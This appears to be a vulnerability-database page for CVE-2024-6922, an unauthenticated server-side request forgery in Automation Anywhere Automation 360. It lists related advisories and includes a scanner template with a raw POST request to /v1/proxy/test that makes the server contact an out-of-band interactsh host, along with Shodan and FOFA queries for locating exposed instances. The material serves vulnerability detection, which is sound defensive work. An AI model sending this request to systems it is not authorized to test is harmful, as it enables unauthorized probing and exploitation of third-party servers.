| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
| CVE-2024-6922 | 26 Jul 202417:11 | – | circl | |
| Automation Anywhere Automation 360 安全漏洞 | 26 Jul 202400:00 | – | cnnvd | |
| CVE-2024-6922 | 26 Jul 202413:52 | – | cve | |
| CVE-2024-6922 Server-Side Request Forgery in Automation 360 | 26 Jul 202413:52 | – | cvelist | |
| CVE-2024-6922 | 26 Jul 202414:15 | – | nvd | |
| PT-2024-37960 · Automation Anywhere · Automation 360 | 26 Jul 202400:00 | – | ptsecurity | |
| CVE-2024-6922: Automation Anywhere Automation 360 Server-Side Request Forgery | 26 Jul 202413:05 | – | rapid7blog | |
| CVE-2024-6922: Automation Anywhere Automation 360 Server-Side Request Forgery | 26 Jul 202413:05 | – | rapid7blog | |
| CVE-2024-6922 Server-Side Request Forgery in Automation 360 | 26 Jul 202413:52 | – | vulnrichment |
id: CVE-2024-6922
info:
name: Automation Anywhere Automation 360 - Server-Side Request Forgery
author: DhiyaneshDK
severity: high
description: |
Automation Anywhere Automation 360 v21-v32 is vulnerable to Server-Side Request Forgery in a web API component.
remediation: |
Apply the latest security patches and updates from the vendor to address this vulnerability.
impact: |
An attacker with unauthenticated access to the Automation 360 Control Room HTTPS service (port 443) or HTTP service (port 80) can trigger arbitrary web requests from the server.
reference:
- https://www.automationanywhere.com/products/automation-360
- https://www.rapid7.com/blog/post/2024/07/26/cve-2024-6922-automation-anywhere-automation-360-server-side-request-forgery/
- https://nvd.nist.gov/vuln/detail/CVE-2024-6922
classification:
epss-score: 0.30172
epss-percentile: 0.97987
cpe: cpe:2.3:a:automationanywhere:automation_360:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
shodan-query: http.favicon.hash:-1005691603
fofa-query: icon_hash="-1005691603"
product: automation_360
vendor: automationanywhere
tags: cve,cve2024,ssrf,oast,automation,anywhere,vuln
http:
- raw:
- |
POST /v1/proxy/test HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"saasUrl":"{{interactsh-url}}/?param=one#"}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"
- type: word
part: body
words:
- '{"message":'
- type: word
part: content_type
words:
- "application/json"
- type: status
status:
- 400
# digest: 4b0a00483046022100ddea005c2c423c061a8e0dfd3936cadaf5da388bdd2cb14ea6dbfd8f9d4b42cb02210089e1b264a377c9d6a78011ebdfd73351ce4a0f349138c1268ed79010d1c19852:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation